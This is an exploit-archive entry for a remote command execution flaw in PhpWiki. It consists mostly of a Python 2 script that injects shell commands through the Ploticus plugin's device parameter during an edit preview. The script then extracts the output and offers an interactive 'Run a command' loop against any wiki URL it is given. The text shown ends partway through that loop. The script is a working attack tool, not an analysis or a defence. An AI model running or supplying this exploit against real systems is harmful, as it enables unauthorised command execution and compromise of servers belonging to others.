PhpWiki - Remote Command Execution
| EKU-ID: 4216 | CVE: | OSVDB-ID: |
| Author: Benjamin Harris | Published: 2014-08-29 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4216 | CVE: | OSVDB-ID: |
| Author: Benjamin Harris | Published: 2014-08-29 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
############################################################### # ____ __ _ __ _ # / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_) # / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / # / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / #/_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ # /_/ /_/ /_/ # Diskovered in Nov/Dec 2011 ############################################################### import urllib import urllib2 import sys def banner(): print " ____ __ _ __ _ " print " / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)" print " / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / " print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / " print " /_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ " print " /_/ /_/ /_/ \n" def usage(): banner() print " [+] Usage example" print " [-] python " + sys.argv[0] + " http://path.to/wiki" if len(sys.argv)< 2: usage() quit() domain = sys.argv[1] def commandexec(cmd): data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')]) cmd1 = urllib2.Request(domain +'/index.php/HeIp',data) cmd2 = urllib2.urlopen(cmd1) output = cmd2.read() firstloc = output.find("123:::\n") + len("123:::\n") secondloc = output.find("\n:::123") return output[firstloc:secondloc] banner() print commandexec('uname -a') print commandexec('id') while(quit != 1): cmd = raw_input('Run a command: ') if cmd == 'quit': print "[-] Hope you had fun :)" quit = 1 if cmd != 'quit':